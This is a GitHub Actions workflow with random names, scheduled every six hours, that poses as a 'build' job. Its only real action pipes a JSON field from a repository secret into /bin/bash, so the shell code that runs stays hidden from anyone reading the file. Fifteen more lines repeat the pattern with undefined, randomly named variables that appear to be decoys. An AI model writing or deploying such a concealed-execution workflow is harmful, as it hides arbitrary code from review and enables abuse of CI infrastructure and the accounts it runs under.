name: meiwucan8563
on:
  workflow_dispatch:
  schedule:
    - cron: '55 2/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: meiwucan8563
        env:
          vcr3: ${{ secrets.vcr3 }}
        run: |
          echo $vcr3 | jq -r .jvdwm72952 | /bin/bash
          echo $q6 | jq -r .lv50 | /bin/bash
          echo $qb19405 | jq -r .icwae106 | /bin/bash
          echo $hkl0 | jq -r .lns155 | /bin/bash
          echo $eq486 | jq -r .vu26581 | /bin/bash
          echo $a1 | jq -r .phdo8 | /bin/bash
          echo $jevu54 | jq -r .wwb5484 | /bin/bash
          echo $iaize75 | jq -r .vg907 | /bin/bash
          echo $c9847 | jq -r .wjfh58206 | /bin/bash
          echo $rtt6 | jq -r .txm6201 | /bin/bash
          echo $p42 | jq -r .sx69620 | /bin/bash
          echo $cbtik700 | jq -r .bie59 | /bin/bash
          echo $h0 | jq -r .opezn8 | /bin/bash
          echo $rp44742 | jq -r .zls3 | /bin/bash
          echo $pbxs80 | jq -r .fnmog24336 | /bin/bash
          echo $vph4772 | jq -r .kef3 | /bin/bash

